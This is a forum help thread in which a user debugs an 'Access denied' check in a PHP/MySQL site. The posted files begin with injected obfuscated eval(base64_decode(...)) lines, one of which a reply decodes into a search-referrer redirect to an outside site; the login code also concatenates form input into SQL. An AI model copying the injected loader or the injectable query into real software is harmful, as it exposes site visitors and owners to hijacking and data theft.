
Help with PHP and MYSQL

Custom Title Activated
Loyal Member
Joined
Nov 25, 2004
Messages
1,249
Reaction score
23
I'm trying to add a new person to the database and it's giving "access denied" out of nowhere; it was working before.

these are my two main files:

Error im getting Access denied.

Access.php
PHP:
<?php	                                       			                                                      eval(base64_decode("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")); ?> 
<?
// NOTE(review): the eval(base64_decode(...)) line at the top of this file is not
// part of the access check. Its payload is not visible here, but an encoded eval
// prepended to a source file is a common sign of injected code, and the author
// later confirms in this thread that the site had been compromised. Restore the
// file from a known-good copy rather than editing the line out by hand.
//
// Access gate: prints the "Access Denied" markup and stops the request unless the
// session's agent_type is "AGENT". It reads $_SESSION directly, so it depends on
// the including script having called session_start() first.
// NOTE(review): != is a loose comparison; a strict !== against the string would
// avoid PHP's type-juggling rules deciding the outcome.
if($_SESSION['agent_type'] != "AGENT"){
?>
<link href="../style.css" rel="stylesheet" type="text/css">

	<div align="center">
	  <p class="r16"><strong>Access Denied...</strong></p>
	  <p>
	    <input name="cancel" type="button" id="cancel" value="Index" onClick="javascript:location.href='../';">
</p>
	</div>
<?
// Halt here so nothing after the include runs for a visitor who is not an agent.
die();
}
?>

add_applicant.php
PHP:
<?php

 // Page bootstrap for add_applicant.php: session, settings, shared includes,
 // the access gate, and two database connection objects.
 // The session has to be started before access.php reads $_SESSION further down.
 session_start();
 // 0 removes the execution time limit for this request.
 set_time_limit(0);
 // Notices are masked, so reading a missing $_SESSION key produces no visible hint.
 error_reporting (E_ALL ^ E_NOTICE);
 // Forces the session language to "EN" on every load of this page.
 $_SESSION['agent_lang'] = "EN"; 

	$base_folder = "";
	$lang = "en";
	include("../function_read_countries.php");
	$paises = function_read_countries("en");

?>
<? 
	// NOTE(review): $permiso is set here, but access.php as posted compares against
	// the literal "AGENT" and never reads $permiso.
	$permiso = "AGENT";
	// NOTE(review): include only warns and carries on when the file cannot be loaded,
	// so a missing access.php would leave this page without its gate; require
	// would stop the request instead.
	include("../access.php");
	include("../functions.php");
?>
<?
include ("../../tconnection.php");
  // TConeccion comes from tconnection.php, which is not shown in the thread.
  $Coneccion = new TConeccion();
  $Coneccion_tmp = new TConeccion();
?>
<?php
	/**
	 * Cuts $text at its first line break and returns the part before it.
	 *
	 * The break is located by converting newlines with nl2br() and searching for
	 * the "<br />" it inserts. Text without a line break comes back unchanged.
	 * NOTE(review): when the break is at offset 0 (text starting with a newline)
	 * nothing is cut and the nl2br() output, "<br />" included, is returned.
	 *
	 * @param string $text
	 * @return string
	 */
	function quitar_enters($text){
		$marcado = nl2br($text);
		$corte = strpos($marcado, "<br />");
		// false (not found) and 0 both fail this test, so only a later break cuts.
		return ($corte > 0) ? substr($marcado, 0, $corte) : $marcado;
	}
?>
This is the header only; the rest is the HTML template.

functions.php
PHP:
<?php	                                       			                                                      eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?> 
<?php	                                       			eval(base64_decode("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"));
// NOTE(review): the two eval(base64_decode(...)) statements above are injected code,
// not part of functions.php. The first payload is decoded further down this thread
// into a referer-based redirect; the second payload is not visible on this page.
// Because the same pattern also heads access.php, the attacker evidently had write
// access to the application files: deleting the lines does not close the entry
// point. Search every PHP file for encoded eval calls, compare against a
// known-good copy or fresh install, patch the CMS, and rotate credentials.

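/**
 * Maps a month number to its English name.
 *
 * Accepts the two-digit strings produced by date("m") ("01".."12") as well as
 * plain integers or unpadded numeric strings, as the original loose switch did.
 * Month 07 now yields "July"; the earlier "Julio" was a leftover Spanish name
 * among otherwise English ones.
 *
 * @param int|string $mes_int Month number, 1 to 12.
 * @return string|null English month name, or null when the input is not a month.
 */
function mes_str($mes_int){
	$meses = array(
		1  => "January",
		2  => "February",
		3  => "March",
		4  => "April",
		5  => "May",
		6  => "June",
		7  => "July",
		8  => "August",
		9  => "September",
		10 => "October",
		11 => "November",
		12 => "December",
	);

	if (!is_numeric($mes_int)) {
		return null;
	}

	// "07" is not a canonical integer key, so normalise before the lookup.
	$indice = (int) $mes_int;
	if ($indice != $mes_int) {
		// Fractional input such as 1.5 is not a month.
		return null;
	}

	// Previously an unmatched value returned an undefined variable (null plus a
	// notice); return null explicitly instead.
	return isset($meses[$indice]) ? $meses[$indice] : null;
}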


/**
 * Formats a number with two decimal places.
 *
 * NOTE(review): the same character, '.', is passed as decimal point and as
 * thousands separator, so 1234.5 is rendered as "1.234.50" - confirm that this
 * is the intended output.
 *
 * @param int|float $numero
 * @return string
 */
function redondear($numero) {
	$decimales = 2;
	$separador = '.';
	return number_format($numero, $decimales, $separador, $separador);
}

/**
 * Returns the date $dias days from today, formatted as "Ymd" (e.g. 20110315).
 *
 * The offset is added to the day-of-month and mktime() normalises any overflow
 * into the following month or year.
 *
 * @param int $dias Number of days to add; may be negative.
 * @return string
 */
function date_dentrode($dias){
	$mes = date("m");
	$dia = date("d") + $dias;
	$anio = date("Y");
	return date("Ymd", mktime(0, 0, 0, $mes, $dia, $anio));
}
?>

By what i understand its checking database and says its not an agent which is the access i need to add new applicants, any1 can help:?:?
 
Joined
Sep 10, 2006
Messages
2,817
Reaction score
1,417
Haven't actually read what you want, but a quick tip that came to my mind while looking at the source, firstly name your functions in english and secondly

PHP:
// Array-lookup sketch of mes_str(); the "// etc" line stands for the remaining
// months, which the post leaves out.
function mes_str($mes_int){
  // Keys are two-digit strings, so only "01".."12" match; an integer 1 or the
  // string "1" is a different key and would not be found.
  $monthsArray = array(
    "01"=>"January",
    "02"=>"February"
    // etc
  );

  // A key that is not in the array evaluates to null and raises a notice.
  return $monthsArray[$mes_int];
}

would be much better, in fact, supposing you want to return those months ALWAYS in english,

PHP:
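/**
 * Returns the English name of a month using date("F").
 *
 * @param int|string $mes_int Month number, 1 to 12 ("01".."12" also accepted).
 * @return string
 */
function mes_str($mes_int){
  // mktime() takes (hour, minute, second, month, day, year). The month number
  // belongs in the fourth position; passing it as the day, as the posted version
  // did, produced a January date for every input. The day is pinned to 1 so no
  // month can overflow into the next one.
  // Values outside 1-12 roll over into the neighbouring year rather than failing.
  $timestamp = mktime(0, 0, 0, (int) $mes_int, 1, 2011);
  return date("F", $timestamp);
}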

would be even better..
 
Joined
May 23, 2008
Messages
1,071
Reaction score
574
where i have a doubt its in the eval(base64_decode that i cannot decode whats behind it.

also part of our webpage is joomla coding.

Really? I google'd base64 decoder and clicked the first link.

Code:
// Decoded form of the payload that was injected at the top of functions.php.
// It is a conditional redirect, not application code.
// Error output is switched off for the rest of the request.
error_reporting(0);
// Acts only while response headers can still be sent.
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
// The user agent is captured but not used in the lines visible here.
$ua=$_SERVER['HTTP_USER_AGENT'];
// Only requests whose Referer names a search engine are affected; a direct visit
// gets the normal page, which likely makes the injection harder to notice.
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	// The condition on the next line is truncated in the post.
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inu		
		// Sends the visitor to an external site and ends the request.
		header("Location: http://buyordie.osa.pl/");
		exit();
	}
}
}
Script injections are annoying...
 
Skilled Illusionist
Joined
Dec 20, 2010
Messages
314
Reaction score
23
Basic

PHP:
// HTTP Basic authentication (Java, although the forum labelled it PHP): the
// Authorization header carries "username:password" in Base64. Base64 is an
// encoding, not encryption, so the header is readable by anyone who can see the
// request; send it over HTTPS only. The URL below is the post's placeholder.
URL url = new URL("http://....");
HttpURLConnection connection = (HttpURLConnection) url.openConnection();

String credentials = username + ":" + password;
String authorization = "Basic " + Base64.encode(credentials);
connection.setRequestProperty("Authorization", authorization);

// Opening the input stream is what actually issues the request.
InputStream in = connection.getInputStream();
 
Last edited:
Infraction Baɴɴed
Loyal Member
Joined
Apr 9, 2008
Messages
1,416
Reaction score
169
how are you setting $_SESSION['agent_type']?

that may be the key as to why its not working and for the months, pass it through a simple array.
PHP:
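/**
 * Maps a month number to its English name through a lookup table.
 *
 * @param int|string $mes_int Month number, 1 to 12 ("01".."12" also accepted).
 * @return string|null Month name, or null when the value is not a month.
 */
function mes_str($mes_int) {
    $months = array(
        1  => "January",
        2  => "February",
        3  => "March",
        4  => "April",
        5  => "May",
        6  => "June",
        7  => "July",
        8  => "August",
        9  => "September",
        10 => "October",
        11 => "November",
        12 => "December",
    );

    // Array keys are not matched with ==: the string "01" (what date("m") and the
    // original switch labels use) is a different key from the integer 1, so the
    // value is cast before the lookup.
    $key = (int) $mes_int;

    // An unknown month previously produced null plus an undefined-index notice.
    return isset($months[$key]) ? $months[$key] : null;
}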
edit:
foxx already posted it LOL
fyi "01" == 1
 
Last edited:
Custom Title Activated
Loyal Member
Joined
Nov 25, 2004
Messages
1,249
Reaction score
23
Just found out in my other thread that the base64 code was there because the joomla got hacked; already fixed that, but I'm still getting access denied in that part of the page.
 
Custom Title Activated
Loyal Member
Joined
Nov 25, 2004
Messages
1,249
Reaction score
23
lol yes, this is bad, im new to the small company im working for and the web administrator is out of the country with no internet access or phone. u r problably guessing where? search for CUBA lol.

spn mind giving me a hand here, im getting tested, could u add me to msn?

---------- Post added at 09:03 AM ---------- Previous post was at 08:55 AM ----------

PHP:
// Login handler fragment from logon.php; the author cut it off inside the final
// switch, so the closing braces are not part of the post.
// Language code read straight from the query string, used by the switch below.
$idioma=$_GET["lan"];
	// NOTE(review): $_POST['email'] and $_POST['password'] are concatenated into the
	// SQL text with no escaping or parameter binding, so request data can change
	// the query itself (SQL injection). Bind both values as parameters instead.
	// NOTE(review): PASS is matched with LIKE, which is pattern matching rather
	// than an exact comparison, and against the raw submitted value, which
	// suggests passwords are stored unhashed - confirm. The usual replacement is a
	// stored password_hash() value checked with password_verify().
	$sql = "SELECT EMAIL, NAME, APPROVED_BY, LANGUAGE";
	$sql .= " FROM agents";
	$sql .= " WHERE EMAIL = '".$_POST['email']."' AND PASS LIKE '".$_POST['password']."'";
	$Coneccion->Gestion($sql);
	// Presumably C holds the number of matched rows; TConeccion is not shown.
	if($Coneccion->C == 1){
		// mysql_* functions belong to the ext/mysql extension, removed in PHP 7.0.
		$Rows = mysql_fetch_array($Coneccion->Query);
		if($Rows['APPROVED_BY'] != "0"){
			// NOTE(review): no session_regenerate_id() call is visible before the
			// session is marked as logged in; issuing a fresh session id at login
			// protects against session fixation.
			$_SESSION['agent_email'] = $Rows['EMAIL'];
			$_SESSION['agent_name'] = $Rows['NAME'];
			// This is the value access.php tests; it is set only on this path.
			$_SESSION['agent_type'] = "AGENT";
			if(!$Rows['LANGUAGE']){
				$_SESSION['agent_lang'] = "EN";
			}else{
				$_SESSION['agent_lang'] = $Rows['LANGUAGE'];
			}
			// NOTE(review): the LANGUAGE column value is used unvalidated as a
			// directory name and then written into inline script; checking it
			// against a fixed list of language codes would contain both uses.
			if(file_exists($_SESSION['agent_lang']."/index.php")){
				$filepath = $_SESSION['agent_lang']."/index.php?c=1";
			}else{
				$filepath = "EN/index.php?c=1";
			}
			echo ("<script>location.href='".$filepath."';</script>");	  
		}else{
			switch($idioma){

this is the logon.php removed some code after switch($idioma) it just bunch of languages.
 
Infraction Baɴɴed
Loyal Member
Joined
Apr 9, 2008
Messages
1,416
Reaction score
169
is it me or does this part seem incomplete:
Code:
$Coneccion->Query
 
Joined
Jun 8, 2007
Messages
1,985
Reaction score
490
PHP:
// Two problems in this one line: request values are concatenated into the SQL
// text unescaped, and the password is matched with LIKE (pattern matching)
// instead of an exact comparison.
$sql .= " WHERE EMAIL = '".$_POST['email']."' AND PASS LIKE '".$_POST['password']."'";
That just drives me mad.

Try this instead:
PHP:
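<?php
	// Login handler fragment (logon.php), reworked from the version posted earlier
	// in the thread. $Coneccion (a TConeccion instance) and an active session are
	// expected to exist already; neither is set up in this fragment.
	//
	// NOTE(review): escaping is the minimum that fits the existing
	// $Coneccion->Gestion($sql) wrapper. Parameterised queries (PDO or mysqli
	// prepared statements) are the sturdier fix, and ext/mysql itself was removed
	// in PHP 7.0.
	// NOTE(review): PASS is still compared with the submitted value directly, which
	// suggests passwords are stored unhashed - confirm. Moving to password_hash()
	// and password_verify() needs a data migration and is outside this fragment.

	//$idioma = $_GET["lan"]; // May not be needed, just use $_GET['lan']
	$email = mysql_real_escape_string($_POST['email']); //Protect against MySQL injection
	$password = mysql_real_escape_string($_POST['password']); //Protect against MySQL injection

	$sql = "SELECT EMAIL, NAME, APPROVED_BY, LANGUAGE";
	$sql .= " FROM agents";
	$sql .= " WHERE EMAIL = '" . $email . "' AND PASS = '" . $password . "'"; //Notice I didn't use 'LIKE' I used '=' for PASS.

	$Coneccion->Gestion($sql);

	// Presumably C holds the number of matched rows; TConeccion is not shown.
	if($Coneccion->C == 1)
	{
		$Rows = mysql_fetch_array($Coneccion->Query);

		if($Rows['APPROVED_BY'] != "0")
		{
			// NOTE(review): consider session_regenerate_id(true) here so the
			// authenticated session does not keep a pre-login session id.
			$_SESSION['agent_email'] = $Rows['EMAIL'];
			$_SESSION['agent_name'] = $Rows['NAME'];
			$_SESSION['agent_type'] = "AGENT";
			$_SESSION['agent_lang'] = (strlen($Rows['LANGUAGE']) ? $Rows['LANGUAGE'] : "EN");

			// The posted line was missing its closing parenthesis and did not parse.
			// NOTE(review): agent_lang comes from the database unvalidated and ends up
			// in a path and in inline script; restrict it to known language codes.
			$filepath = (file_exists($_SESSION['agent_lang'] . "/index.php") ? ($_SESSION['agent_lang'] . "/index.php?c=1") : "EN/index.php?c=1");

			echo("<script>location.href='" . $filepath . "';</script>");
		} else {
			switch( (isset($_GET["lan"]) ? $_GET['lan'] : '') )
			{
				//..case..case..case
			}

			//..
		}

		//..
	}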
 